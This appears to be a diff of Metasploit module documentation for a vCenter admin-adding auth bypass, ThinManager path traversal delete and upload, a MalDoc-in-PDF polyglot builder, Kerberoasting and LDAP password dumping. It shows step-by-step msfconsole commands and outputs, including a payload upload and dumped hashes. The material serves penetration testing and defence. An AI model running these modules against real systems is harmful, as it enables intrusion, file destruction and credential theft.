-   DOMAIN                         no        The domain to authenticate to
-   NEW_PASSWORD                   no        Password of admin user to add
-   NEW_USERNAME                   no        Username of admin user to add
-   PASSWORD                       no        The password to authenticate with
-   RHOSTS                         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT         636              yes       The target port
+   NEW_PASSWORD                   yes       Password of admin user to add
+   NEW_USERNAME                   yes       Username of admin user to add
   SSL           true             no        Enable SSL on the LDAP connection
-   USERNAME                       no        The username to authenticate with
+
+
+   Used when connecting via an existing SESSION:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   no        The session to run this module on
+
+
+   Used when making a new connection via RHOSTS:
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   LDAPDomain                     no        The domain to authenticate to
+   LDAPPassword                   no        The password to authenticate with
+   LDAPUsername                   no        The username to authenticate with
+   RHOSTS                         no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
+                                            metasploit.html
+   RPORT         636              no        The target port


 Auxiliary action:
@@ -80,6 +93,8 @@ Auxiliary action:
   Add   Add an admin user


+
+View the full module info with the info, or info -d command.
 msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set rhosts [redacted]
 rhosts => [redacted]
 msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set new_username msfadmin
@@ -136,22 +151,35 @@ msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) >
 ### VMware vCenter Server 6.7.0.2 virtual appliance on ESXi (not vulnerable target)

 ```
-msf6 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > options
+msf6 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > show options

 Module options (auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass):

-   Name      Current Setting                         Required  Description
-   ----      ---------------                         --------  -----------
-   BASE_DN   dc=vsphere,dc=local                     no        LDAP base DN if you already have it
-   USERNAME  cn=192.168.3.32,ou=Domain Controlle     no        The username to authenticate to LDAP server
-             rs,dc=vsphere,dc=local
-   PASSWORD  #$F4!4SeV\BL~L2gb(oa                    no        Password for the BIND_DN
-   NEW_PASSWORD  NewPassword123#                     no        Password of admin user to add
-   RHOSTS    192.168.3.32                            yes       The target host(s), see https://github.com/rapid7/metasploit-framework
-                                                               /wiki/Using-Metasploit
-   RPORT     636                                     yes       The target port
-   SSL       true                                    no        Enable SSL on the LDAP connection
-   NEW_USERNAME  MsfAdmin                            no        Username of admin user to add
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   BASE_DN                        no        LDAP base DN if you already have it
+   NEW_PASSWORD                   yes       Password of admin user to add
+   NEW_USERNAME                   yes       Username of admin user to add
+   SSL           true             no        Enable SSL on the LDAP connection
+
+
+   Used when connecting via an existing SESSION:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   no        The session to run this module on
+
+
+   Used when making a new connection via RHOSTS:
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   LDAPDomain                     no        The domain to authenticate to
+   LDAPPassword                   no        The password to authenticate with
+   LDAPUsername                   no        The username to authenticate with
+   RHOSTS                         no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
+                                            metasploit.html
+   RPORT         636              no        The target port


 Auxiliary action:
@@ -161,6 +189,49 @@ Auxiliary action:
   Add   Add an admin user


+
+View the full module info with the info, or info -d command.
+msf6 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > show options
+
+Module options (auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   BASE_DN                        no        LDAP base DN if you already have it
+   NEW_PASSWORD                   yes       Password of admin user to add
+   NEW_USERNAME                   yes       Username of admin user to add
+   SSL           true             no        Enable SSL on the LDAP connection
+
+
+   Used when connecting via an existing SESSION:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   no        The session to run this module on
+
+
+   Used when making a new connection via RHOSTS:
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   LDAPDomain                     no        The domain to authenticate to
+   LDAPPassword                   no        The password to authenticate with
+   LDAPUsername                   no        The username to authenticate with
+   RHOSTS                         no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
+                                            metasploit.html
+   RPORT         636              no        The target port
+
+
+Auxiliary action:
+
+   Name  Description
+   ----  -----------
+   Add   Add an admin user
+
+
+
+View the full module info with the info, or info -d command.
+
 msf6 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > run
 [*] Running module against 192.168.3.32

@@ -0,0 +1,55 @@
+## Vulnerable Application
+
+This module exploits a path traversal vulnerability in ThinManager <= v13.1.0 (CVE-2023-2915) to delete an arbitrary file from the
+system.
+
+The affected service listens by default on TCP port 2031 and runs in the context of NT AUTHORITY\SYSTEM.
+
+## Testing
+
+The software can be obtained from
+[the vendor](https://thinmanager.com/downloads/).
+
+**Successfully tested on**
+
+- ThinManager v13.1.0 on Windows 22H2
+- ThinManager v13.0.1 on Windows 22H2
+- ThinManager v13.0.0 on Windows 22H2
+- ThinManager v12.1.5 on Windows 22H2
+- ThinManager v10.0.2 on Windows 22H2
+
+## Verification Steps
+
+1. Install and run the application
+2. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use auxiliary/gather/thinmanager_traversal_delete
+msf6 auxiliary(gather/thinmanager_traversal_delete) > set RHOSTS <IP>
+msf6 auxiliary(gather/thinmanager_traversal_delete) > set FILE <file to delete>
+msf6 auxiliary(gather/thinmanager_traversal_delete) > run
+```
+
+This should delete the file as specified through FILE from the remote server.
+
+## Options
+
+### FILE
+The file to delete from the remote server.
+
+## Scenarios
+
+Running the exploit against ThinManager v13.0.1 on Windows 22H2 should result in an output similar to the following:
+
+```
+msf6 auxiliary(gather/thinmanager_traversal_delete) > run
+[*] Running module against 192.168.137.229
+
+[*] 192.168.137.229:2031 - Running automatic check ("set AutoCheck false" to disable)
+[!] 192.168.137.229:2031 - The service is running, but could not be validated.
+[*] 192.168.137.229:2031 - Sending handshake...
+[*] 192.168.137.229:2031 - Received handshake response.
+[*] 192.168.137.229:2031 - Deleting /Windows/win.ini from 192.168.137.229
+[+] 192.168.137.229:2031 - Received response from target.
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,61 @@
+## Vulnerable Application
+
+This module exploits a path traversal vulnerability in ThinManager <= v13.0.1 (CVE-2023-27855) to upload an arbitrary file to the target
+system.
+
+The affected service listens by default on TCP port 2031 and runs in the context of NT AUTHORITY\SYSTEM.
+
+## Testing
+
+The software can be obtained from
+[the vendor](https://thinmanager.com/downloads/).
+
+**Successfully tested on**
+
+- ThinManager v13.0.1 on Windows 22H2
+- ThinManager v13.0.0 on Windows 22H2
+- ThinManager v12.1.5 on Windows 22H2
+- ThinManager v10.0.2 on Windows 22H2
+
+## Verification Steps
+
+1. Install and run the application
+2. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use auxiliary/admin/networking/thinmanager_traversal_upload 
+msf6 auxiliary(admin/networking/thinmanager_traversal_upload) > set RHOSTS <IP>
+msf6 auxiliary(admin/networking/thinmanager_traversal_upload) > set LFILE <local file location>
+msf6 auxiliary(admin/networking/thinmanager_traversal_upload) > set RFILE <remote file location>
+msf6 auxiliary(admin/networking/thinmanager_traversal_upload) > run
+```
+
+This should upload the local file specified through LFILE to the server, as specified in RFILE.
+
+## Options
+
+### LFILE
+Specifies the local file to upload to the remote server.
+
+### RFILE
+Specifies the remote file location where the file will be uploaded to.
+
+## Scenarios
+
+Running the exploit against ThinManager v13.0.1 on Windows 22H2 should result in an output similar to the following:
+
+```
+msf6 auxiliary(admin/networking/thinmanager_traversal_upload) > run
+[*] Running module against 192.168.137.227
+
+[*] 192.168.137.227:2031 - Running automatic check ("set AutoCheck false" to disable)
+[!] 192.168.137.227:2031 - The service is running, but could not be validated.
+[*] 192.168.137.227:2031 - Sending handshake...
+[*] 192.168.137.227:2031 - Received handshake response.
+[*] 192.168.137.227:2031 - Read 27648 bytes from /tmp/payload.exe
+[*] 192.168.137.227:2031 - Uploading /tmp/payload.exe as /Program Files/Rockwell Software/ThinManager/payload.exe on the remote host...
+[*] 192.168.137.227:2031 - Upload request length: 27752 bytes
+[!] 192.168.137.227:2031 - No response received after upload.
+[+] 192.168.137.227:2031 - Upload process completed. Check if '/Program Files/Rockwell Software/ThinManager/payload.exe' exists on the target.
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,62 @@
+## Vulnerable Application
+
+This module exploits a path traversal vulnerability in ThinManager <= v13.1.0 (CVE-2023-2917) to upload an arbitrary file to the target
+system.
+
+The affected service listens by default on TCP port 2031 and runs in the context of NT AUTHORITY\SYSTEM.
+
+## Testing
+
+The software can be obtained from
+[the vendor](https://thinmanager.com/downloads/).
+
+**Successfully tested on**
+
+- ThinManager v13.1.0 on Windows 22H2
+- ThinManager v13.0.1 on Windows 22H2
+- ThinManager v12.0.0 on Windows 22H2
+- ThinManager v12.1.5 on Windows 22H2
+- ThinManager v12.0.4 on Windows 22H2
+
+## Verification Steps
+
+1. Install and run the application
+2. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use auxiliary/admin/networking/thinmanager_traversal_upload2 
+msf6 auxiliary(admin/networking/thinmanager_traversal_upload2) > set RHOSTS <IP>
+msf6 auxiliary(admin/networking/thinmanager_traversal_upload2) > set LFILE <local file location>
+msf6 auxiliary(admin/networking/thinmanager_traversal_upload2) > set RFILE <remote file location>
+msf6 auxiliary(admin/networking/thinmanager_traversal_upload2) > run
+```
+
+This should upload the local file specified through LFILE to the server, as specified in RFILE.
+
+## Options
+
+### LFILE
+Specifies the local file to upload to the remote server.
+
+### RFILE
+Specifies the remote file location where the file will be uploaded to.
+
+## Scenarios
+
+Running the exploit against ThinManager v13.1.0 on Windows 22H2 should result in an output similar to the following:
+
+```
+msf6 auxiliary(admin/networking/thinmanager_traversal_upload2) > run
+[*] Running module against 192.168.137.229
+
+[*] 192.168.137.229:2031 - Running automatic check ("set AutoCheck false" to disable)
+[!] 192.168.137.229:2031 - The service is running, but could not be validated.
+[*] 192.168.137.229:2031 - Sending handshake...
+[*] 192.168.137.229:2031 - Received handshake response.
+[*] 192.168.137.229:2031 - Read 27648 bytes from /tmp/payload.exe
+[*] 192.168.137.229:2031 - Uploading /tmp/payload.exe as /Program Files/Rockwell Software/ThinManager/payload.exe on the remote host...
+[*] 192.168.137.229:2031 - Upload request length: 27752 bytes
+[!] 192.168.137.229:2031 - No response received after upload.
+[+] 192.168.137.229:2031 - Upload process completed. Check if '/Program Files/Rockwell Software/ThinManager/payload.exe' exists on the target.
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,101 @@
+## Vulnerable Application
+
+The technique is called "MalDoc in PDF". This technique hides malicious Word documents in PDF files,
+which is why malicious code contained in them cannot be detected by many analysis tools.
+
+The document can be opened in both Microsoft Word and a PDF reader.
+
+However, for the macro to run, you must open this document in Microsoft Word. The attack does not bypass
+configured macro locks. The malicious macros are also not executed when the file is opened in PDF readers
+or similar software.
+
+### Introduction
+
+A malicious MHT file created can be opened in Microsoft Word even though it has magic numbers and file
+structure of PDF.
+
+If the file has configured macro, by opening it in Microsoft Word, VBS runs and performs malicious behaviors.
+
+## For Testing
+
+You create a `Single File Web Page (*.mht, *.mhtml)` file containing a VBS macro. For testing, you can use the
+following macro:
+
+```
+Sub AutoOpen()
+   MsgBox "Macro executed successfully!", vbInformation, "Information"
+End Sub
+```
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `auxiliary/fileformat/maldoc_in_pdf_polyglot`
+3. Do: `set FILENAME /tmp/macro.htm`
+4. Do: `run`
+
+## Options
+
+### FILENAME
+
+The input MHT filename with macro embedded.
+
+### INJECTED_PDF
+
+The input PDF filename to be injected. (optional)
+
+### MESSAGE_PDF
+
+The message to display in the local PDF template (if INJECTED_PDF is NOT used). Default: You must open this document in Microsoft Word
+
+## Scenarios
+
+### Create without PDF template
+
+```
+msf6 auxiliary(fileformat/maldoc_in_pdf_polyglot) > options 
+
+Module options (auxiliary/fileformat/maldoc_in_pdf_polyglot):
+
+   Name          Current Setting                                Required  Description
+   ----          ---------------                                --------  -----------
+   FILENAME      /tmp/macro.mht                                 yes       The input MHT filename with macro embedded
+   INJECTED_PDF                                                 no        The input PDF filename to be injected (optional)
+   MESSAGE_PDF   You must open this document in Microsoft Word  no        The message to display in the local PDF template (if INJECTED_PDF is NOT used)
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(fileformat/maldoc_in_pdf_polyglot) > run
+[*] PDF creation using local template
+[+] The file 'macro.doc' is stored at '/home/mekhalleh/.msf4/local/macro.doc'
+[*] Auxiliary module execution completed
+```
+
+### Create using PDF template
+
+```
+msf6 auxiliary(fileformat/maldoc_in_pdf_polyglot) > options 
+
+Module options (auxiliary/fileformat/maldoc_in_pdf_polyglot):
+
+   Name          Current Setting                                Required  Description
+   ----          ---------------                                --------  -----------
+   FILENAME      /tmp/macro.mht                                 yes       The input MHT filename with macro embedded
+   INJECTED_PDF  /tmp/injected.pdf                              no        The input PDF filename to be injected (optional)
+   MESSAGE_PDF   You must open this document in Microsoft Word  no        The message to display in the local PDF template (if INJECTED_PDF is NOT used)
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(fileformat/maldoc_in_pdf_polyglot) > run
+[*] PDF creation using 'injected.pdf' as template
+[+] The file 'macro.doc' is stored at '/home/mekhalleh/.msf4/local/macro.doc'
+[*] Auxiliary module execution completed
+```
+
+## References
+
+1. <https://blogs.jpcert.or.jp/en/2023/08/maldocinpdf.html>
+2. <https://socradar.io/maldoc-in-pdf-a-novel-method-to-distribute-malicious-macros/>
+3. <https://www.nospamproxy.de/en/maldoc-in-pdf-danger-from-word-files-hidden-in-pdfs/>
+4. <https://github.com/exa-offsec/maldoc_in_pdf_polyglot/tree/main/demo>
@@ -1,31 +0,0 @@
-## Description
-
-This module will try to find Service Principal Names (SPN) that are associated with normal user accounts on the specified domain and then submit requests to retrieve Ticket Granting Service (TGS) tickets for those accounts, which may be partially encrypted with the SPNs NTLM hash. After retrieving the TGS tickets, offline brute forcing attacks can be performed to retrieve the passwords for the SPN accounts.
-
-## Verification Steps
-
-To avoid library/version conflict, it would be useful to have a pipenv virtual environment.
-
-* `pipenv --two && pipenv shell`
-* Follow the [impacket installation steps](https://github.com/CoreSecurity/impacket#installing) to install the required libraries.
-* Have a domain user account credentials
-* `./msfconsole -q -x 'use auxiliary/gather/get_user_spns; set rhosts <dc-ip> ; set smbuser <user> ; set smbpass <password> ; set smbdomain <domain> ; run'`
-* Get Hashes
-
-## Scenarios
-
-```
-$ ./msfconsole -q -x 'use auxiliary/gather/get_user_spns; set rhosts <dc-ip> ; set smbuser <user> ; set smbpass <password> ; set smbdomain <domain> ; run'
-rhosts => <dc-ip>
-smbuser => <user>
-smbpass => <password>
-smbdomain => <domain>
-[*] Running for <domain>...
-[*] Total of records returned <num>
-[+] ServicePrincipalName                              Name        MemberOf                                                                          PasswordLastSet      LastLogon           
-[+] ------------------------------------------------  ----------  --------------------------------------------------------------------------------  -------------------  -------------------
-[+] SPN...              User...   List...  DateTime... Time... 
-[+] $krb5tgs$23$*user$realm$test/spn*$<data>
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-```
@@ -0,0 +1,72 @@
+## Kerberoast
+
+This module will try to find Service Principal Names (SPN) that are associated with normal user accounts on the specified domain, and then submit requests to retrieve Ticket Granting Service (TGS) tickets for those accounts, which may be partially encrypted with the SPN user's NTLM hash. After retrieving the TGS tickets, offline brute forcing attacks can be performed to retrieve the passwords for the SPN accounts.
+
+## Module usage
+
+- Start `msfconsole`
+- Do: `use auxiliary/gather/kerberoast`
+- Do: `run rhost=<IP> domain=<FQDN> password=<pass> username=<username> target_user=<optional_user>`
+- If a target user has been requested, the module will log in to LDAP, find any SPNs associated with that user, and then request that service ticket.
+- If no target user has been requested, the module will request service tickets for all available users.
+- A crackable value will be displayed for all valid accounts.
+
+
+## Options
+
+### DOMAIN / LDAPDOMAIN
+The Fully Qualified Domain Name (FQDN). Ex: mydomain.local.
+
+### USERNAME / LDAPUSERNAME
+The username to authenticate to the DC with
+
+### PASSWORD / LDAPPASSWORD
+The password to authenticate to the DC with
+
+### Rhostname
+
+The hostname of the domain controller. Must be accurate otherwise the module will silently fail, even if users exist without pre-auth required.
+
+## Scenarios
+
+### Target user
+
+To retrieve a TGS for a particular user, set `TARGET_USER`.
+
+```msf
+msf6 auxiliary(gather/kerberoast) > run rhost=20.248.208.9 ldapdomain=msf.local ldappassword=PasswOrd123 ldapusername=AzureAdmin target_user=low.admin
+[*] Running module against 20.248.208.9
+[+] 20.248.208.9:88 - Received a valid TGT-Response
+[*] 20.248.208.9:389 - TGT MIT Credential Cache ticket saved to /home/user/.msf4/loot/20250513155454_default_20.248.208.9_mit.kerberos.cca_656516.bin
+[+] 20.248.208.9:88 - Received a valid TGS-Response
+[*] 20.248.208.9:389 - TGS MIT Credential Cache ticket saved to /home/user/.msf4/loot/20250513155454_default_20.248.208.9_mit.kerberos.cca_233943.bin
+[+] Success:
+$krb5tgs$17$low.admin$MSF.LOCAL$*http/abc.msf.local*$faf4a87156a49afd69de3c8b$582f8daec4a5f88fba...
+[*] Auxiliary module execution completed
+```
+
+### All users
+
+```
+msf6 auxiliary(gather/kerberoast) > run rhost=20.248.208.9 ldapdomain=msf.local ldappassword=PasswOrd123 ldapusername=AzureAdmin
+[*] Running module against 20.248.208.9
+
+[+] 20.248.208.9:88 - Received a valid TGT-Response
+[*] 20.248.208.9:389 - TGT MIT Credential Cache ticket saved to /home/smash/.msf4/loot/20250513155630_default_20.248.208.9_mit.kerberos.cca_281438.bin
+[+] 20.248.208.9:88 - Received a valid TGS-Response
+[*] 20.248.208.9:389 - TGS MIT Credential Cache ticket saved to /home/smash/.msf4/loot/20250513155630_default_20.248.208.9_mit.kerberos.cca_360340.bin
+[+] 20.248.208.9:88 - Received a valid TGT-Response
+[*] 20.248.208.9:389 - TGT MIT Credential Cache ticket saved to /home/smash/.msf4/loot/20250513155630_default_20.248.208.9_mit.kerberos.cca_642663.bin
+[+] 20.248.208.9:88 - Received a valid TGS-Response
+[*] 20.248.208.9:389 - TGS MIT Credential Cache ticket saved to /home/smash/.msf4/loot/20250513155630_default_20.248.208.9_mit.kerberos.cca_556183.bin
+
+[+] Query returned 2 results.
+[+] Success:
+$krb5tgs$23$*kerber.roastable$MSF.LOCAL$http/abc2.msf.local*$d335dc07b2c018de2a19e2ecc102bd1d$abc848...
+$krb5tgs$17$low.admin$MSF.LOCAL$*http/abc.msf.local*$a1c7c1c1e31e36cdb0721928$b69b48...
+[!] NOTE: Multiple encryption types returned - will require separate cracking runs for each type.
+[*] To obtain the crackable values for a praticular type, run `creds`:
+[*] creds -t krb5tgs-rc4 -O 20.248.208.9 -o <outfile.(jtr|hcat)>
+[*] creds -t krb5tgs-aes128 -O 20.248.208.9 -o <outfile.(jtr|hcat)>
+[*] Auxiliary module execution completed
+```
@@ -1,204 +0,0 @@
-## Vulnerable Application
-
-### Description
-
-This module uses an LDAP connection to dump data from LDAP server
-using an anonymous or authenticated bind.
-Searching for specific attributes it collects user credentials.
-
-### Setup
-
-Tested in the wild.
-
-You may eventually setup an intentionally insecure OpenLDAP server in docker.
-The below OpenLDAP server does not have any ACL, therefore the hashPassword
-attributes are readable by anonymous clients.
-
-```
-$ git clone https://github.com/HynekPetrak/bitnami-docker-openldap.git
-$ cd bitnami-docker-openldap
-$ docker-compose up -d
-Creating bitnami-docker-openldap_openldap_1 ... done
-
-msf5 auxiliary(gather/ldap_hashdump) > set RHOSTS 127.0.0.1
-RHOSTS => 127.0.0.1
-msf5 auxiliary(gather/ldap_hashdump) > set RPORT 1389
-RPORT => 1389
-msf5 auxiliary(gather/ldap_hashdump) > options
-
-Module options (auxiliary/gather/ldap_hashdump):
-
-   Name          Current Setting                                        Required  Description
-   ----          ---------------                                        --------  -----------
-   BASE_DN                                                              no        LDAP base DN if you already have it]
-   DOMAIN                                                               no        The domain to authenticate to
-   MAX_LOOT                                                             no        Maximum number of LDAP entries to loot
-   PASSWORD                                                             no        The password to authenticate with
-   PASS_ATTR     userPassword, sambantpassword, sambalmpassword, mailu  yes       LDAP attribute, that contains password hashes
-                 serpassword, password, pwdhistory, passwordhistory, c
-                 learpassword
-   READ_TIMEOUT  600                                                    no        LDAP read timeout in seconds
-   RHOSTS        127.0.0.1                                              yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.h
-                                                                                  tml
-   RPORT         1389                                                   yes       The target port
-   SSL           true                                                   no        Enable SSL on the LDAP connection
-   THREADS       1                                                      yes       The number of concurrent threads (max one per host)
-   USERNAME                                                             no        The username to authenticate with
-   USER_ATTR     dn                                                     no        LDAP attribute(s), that contains username
-
-                                                                                                                                                                                           Auxiliary action:
-   Name  Description
-   ----  -----------
-   Dump  Dump all LDAP data
-
-
-msf5 auxiliary(gather/ldap_hashdump) >
-
-msf5 auxiliary(gather/ldap_hashdump) > run
-[*] Running module against 127.0.0.1
-
-[*] Discovering base DN automatically
-[*] Searching root DSE for base DN
-[+] Discovered base DN: dc=example,dc=org
-[*] Dumping LDAP data from server at 127.0.0.1:1389
-[*] Storing LDAP data in loot
-[+] Saved LDAP data to /home/hynek/.msf4/loot/20200801220435_default_127.0.0.1_LDAPInformation_704646.txt
-[*] Searching for attribute: userPassword
-[*] Taking dn attribute as username
-[+] Credentials found: cn=user01,ou=users,dc=example,dc=org:password1
-[+] Credentials found: cn=user02,ou=users,dc=example,dc=org:password2
-[*] Auxiliary module execution completed
-msf5 auxiliary(gather/ldap_hashdump) >
-
-```
-
-## Verification Steps
-
-Follow [Setup](#setup) and [Scenarios](#scenarios).
-
-## Actions
-
-### Dump
-
-Dump all LDAP data from the LDAP server.
-
-## Options
-
-### BASE_DN
-
-If you already have the LDAP base DN, you may set it in this option.
-
-### USER_ATTR
-
-LDAP attribute to take the user name from. Defaults to DN, however you may
-wish to change it UID, name or similar.
-
-### PASS_ATTR
-
-LDAP attribute to take the password hash from. Defaults to userPassword,
-some LDAP server may use different attribute, e.g. unixUserPassword,
-sambantpassword, sambalmpassword.
-
-## Scenarios
-
-### Avaya Communication Manager via anonymous bind
-
-```
-msf5 > use auxiliary/gather/ldap_hashdump
-msf5 auxiliary(gather/ldap_hashdump) > options
-
-Module options (auxiliary/gather/ldap_hashdump):
-
-   Name       Current Setting  Required  Description
-   ----       ---------------  --------  -----------
-   BASE_DN                     no        LDAP base DN if you already have it
-   PASS_ATTR  userPassword     yes       LDAP attribute, that contains password hashes
-   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
-   RPORT      389              yes       The target port
-   SSL        false            no        Enable SSL on the LDAP connection
-   USER_ATTR  dn               no        LDAP attribute, that contains username
-
-
-Auxiliary action:
-
-   Name  Description
-   ----  -----------
-   Dump  Dump all LDAP data
-
-
-msf5 auxiliary(gather/ldap_hashdump) > set RHOSTS [redacted_ip_address]
-RHOSTS => [redacted_ip_address]
-
-msf5 auxiliary(gather/ldap_hashdump) > run
-[*] Running module against [redacted_ip_address]
-
-[*] Discovering base DN automatically
-[*] Searching root DSE for base DN
-[+] Discovered base DN: dc=vsp
-[*] Dumping LDAP data from server at [redacted_ip_address]:389
-[*] Storing LDAP data in loot
-[+] Saved LDAP data to /home/hynek/.msf4/loot/20200726121633_default_[redacted_ip_address]_LDAPInformation_716210.txt
-[*] Searching for attribute: userPassword
-[*] Taking dn attribute as username
-[+] Credentials found: uid=cust,ou=People,dc=vsp:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
-[+] Credentials found: uid=admin,ou=People,dc=vsp:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
-[*] Auxiliary module execution completed
-msf5 auxiliary(gather/ldap_hashdump) > set USER_ATTR uid
-USER_ATTR => uid
-msf5 auxiliary(gather/ldap_hashdump) > run
-[*] Running module against [redacted_ip_address]
-
-[*] Discovering base DN automatically
-[*] Searching root DSE for base DN
-[+] Discovered base DN: dc=vsp
-[*] Dumping LDAP data from server at [redacted_ip_address]:389
-[*] Storing LDAP data in loot
-[+] Saved LDAP data to /home/hynek/.msf4/loot/20200726121718_default_[redacted_ip_address]_LDAPInformation_712562.txt
-[*] Searching for attribute: userPassword
-[*] Taking uid attribute as username
-[+] Credentials found: cust:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
-[+] Credentials found: admin:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
-[*] Auxiliary module execution completed
-msf5 auxiliary(gather/ldap_hashdump) >
-```
-
-### NASDeluxe - NAS with Samba LM/NTLM hashes
-
-```
-msf5 auxiliary(gather/ldap_hashdump) > set USER_ATTR uid
-USER_ATTR => uid
-msf5 auxiliary(gather/ldap_hashdump) > set PASS_ATTR sambantpassword
-PASS_ATTR => sambantpassword
-msf5 auxiliary(gather/ldap_hashdump) > set RHOSTS [redacted_ip_address]
-RHOSTS => [redacted_ip_address]
-
-msf5 auxiliary(gather/ldap_hashdump) > run
-[*] Running module against [redacted_ip_address]
-
-[*] Discovering base DN automatically
-[*] Searching root DSE for base DN
-[+] Discovered base DN: dc=server,dc=nas
-[*] Dumping LDAP data from server at [redacted_ip_address]:389
-[*] Storing LDAP data in loot
-[+] Saved LDAP data to /home/hynek/.msf4/loot/20200726201006_default_[redacted_ip_address]_LDAPInformation_026574.txt
-[*] Searching for attribute: sambantpassword
-[*] Taking uid attribute as username
-[+] Credentials found: admin:209C6174DA490CAEB422F3FA5A7AE634
-[+] Credentials found: joe:58E8C758A4E67F34EF9C40944EB5535B
-[*] Auxiliary module execution completed
-
-msf5 auxiliary(gather/ldap_hashdump) > run
-[*] Running module against [redacted_ip_address]
-
-[*] Discovering base DN automatically
-[*] Searching root DSE for base DN
-[+] Discovered base DN: dc=server,dc=nas
-[*] Dumping LDAP data from server at [redacted_ip_address]:389
-[*] Storing LDAP data in loot
-[+] Saved LDAP data to /home/hynek/.msf4/loot/20200726201731_default_[redacted_ip_address]_LDAPInformation_427417.txt
-[*] Searching for attribute: sambalmpassword
-[*] Taking uid attribute as username
-[+] Credentials found: admin:F0D412BD764FFE81AAD3B435B51404EE
-[+] Credentials found: joe:3417BE166A79DDE2AAD3B435B51404EE
-[*] Auxiliary module execution completed
-```
@@ -0,0 +1,152 @@
+## Vulnerable Application
+
+### Description
+
+This module will gather passwords and password hashes from a target LDAP server via multiple techniques including
+Windows LAPS.
+
+### Setup (OpenLDAP via Docker)
+
+Tested in the wild.
+
+You may eventually setup an intentionally insecure OpenLDAP server in docker.
+The below OpenLDAP server does not have any ACL, therefore the hashPassword
+attributes are readable by anonymous clients.
+
+```
+$ git clone https://github.com/HynekPetrak/bitnami-docker-openldap.git
+$ cd bitnami-docker-openldap
+$ docker-compose up -d
+Creating bitnami-docker-openldap_openldap_1 ... done
+```
+
+```
+msf6 auxiliary(gather/ldap_passwords) > rerun ldap://:@127.0.0.1:1389
+[*] Reloading module...
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Discovered base DN: dc=example,dc=org
+[*] The target LDAP server is not an Active Directory Domain Controller.
+[*] Searching base DN: dc=example,dc=org
+[+] Credentials (password) found in userpassword: user01:password1
+[+] Credentials (password) found in userpassword: user02:password2
+[*] Found 2 entries and 2 credentials in 'dc=example,dc=org'.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_passwords) >
+```
+
+### Setup (Windows LAPSv1)
+1. Start with a Windows Domain Controller
+2. Install all the programs from the applicable binary from https://www.microsoft.com/en-us/download/details.aspx?id=46899
+3. Make sure the user account is a Schema Admin, reboot after joining the group
+4. Set the Group Policy settings as noted in Section 3 of the “LAPS_OperationsGuide.docx” file
+5. Run the UI as noted in Section 4, the LDAP attributes should be populated at this point
+
+### Setup (Windows LAPSv2)
+1. Start with a Windows Domain Controller that has the April 2023 security update installed
+2. Follow the instructions from https://learn.microsoft.com/en-us/windows-server/identity/laps/laps-scenarios-windows-server-active-directory
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Options
+
+### BASE_DN
+
+If you already have the LDAP base DN, you may set it in this option.
+
+### USER_ATTR
+
+LDAP attribute to that contains the username. Defaults to the first attribute that exists in the search order
+`sAMAccountName` (Active Directory), `uid` (OpenLDAP), `dn`.
+
+### PASS_ATTR
+
+LDAP attribute to take the password data from. This option will be added to the array of options the module always
+searches for.
+
+## Scenarios
+
+### Avaya Communication Manager via anonymous bind
+
+```
+msf6 auxiliary(gather/ldap_passwords) > options
+
+Module options (auxiliary/gather/ldap_passwords):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   BASE_DN                        no        LDAP base DN if you already have it
+   PASS_ATTR     userPassword     no        Additional LDAP attribute(s) that contain password hashes
+   READ_TIMEOUT  600              no        LDAP read timeout in seconds
+   SSL           false            no        Enable SSL on the LDAP connection
+   USER_ATTR                      no        LDAP attribute(s), that contains username
+
+
+   Used when connecting via an existing SESSION:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   no        The session to run this module on
+
+
+   Used when making a new connection via RHOSTS:
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   LDAPDomain                     no        The domain to authenticate to
+   LDAPPassword                   no        The password to authenticate with
